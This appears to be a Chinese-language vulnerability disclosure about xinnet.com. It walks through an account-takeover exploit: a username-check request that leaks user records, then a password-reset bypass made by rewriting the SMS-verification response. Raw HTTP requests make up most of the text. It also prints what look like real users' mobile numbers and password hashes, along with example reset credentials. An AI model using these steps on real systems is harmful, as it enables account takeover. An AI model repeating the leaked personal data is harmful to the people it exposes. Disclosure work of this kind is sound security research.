新网某处设计缺陷可任意用户密码重置及手机号密码密文泄漏（大众点评网为例）

简要描述：

新网某处设计缺陷可任意用户密码重置及手机号密码密文泄漏（大众点评网为例）

详细说明：

重置密码要先从敏感信息泄漏开始

code 区域

POST /user/userlogin.do?method=checkUserName HTTP/1.1

Host: www.xinnet.com

Proxy-Connection: keep-alive

Content-Length: 18

Accept: application/json, text/javascript, */*; q=0.01

Origin: http://www.xinnet.com

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

DNT: 1

Referer: http://www.xinnet.com/views/loginnew/forgetpwd.jsp

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4

AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.3



userName=hy4911980

利用敏感信息泄漏，我们可以获取

code 区域

{"id":4535227,"agentCode":"hy4911980","email":"151******71","password":"$1$39$QCqKIUdkYwfj20lFApPbE0","mobileNum":"15165955871","state":"02"}

code 区域

{"id":4535226,"agentCode":"hy4911979","userEmail":"[email protected]","userNameEmail":"[email protected]","email":"138******38","password":"$1$99$E/YOf1qM9JWviO5wdnXes0","mobileNum":"13832465238","state":"02"}

password不知道什么加密方式，暂且先不理会，我们需要用到的是会员的手机号

去找回密码处利用会员名（hy4911979）手机号（13832465238） 进行找回密码

抓包

code 区域

POST /user/userlogin.do?method=checkMobileVerifyCode HTTP/1.1

Host: www.xinnet.com

Proxy-Connection: keep-alive

Content-Length: 33

Accept: text/plain, */*; q=0.01

Origin: http://www.xinnet.com

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

DNT: 1

Referer: http://www.xinnet.com/views/loginnew/forgetpwd.jsp

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4

AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.3



MobileNum=13832465238&Code=123456

修改该请求的返回包为：verify_code_is_right

13832465238 wooyuntest123

漏洞证明：

大众点评网为例：

15800310255 wooyuntest123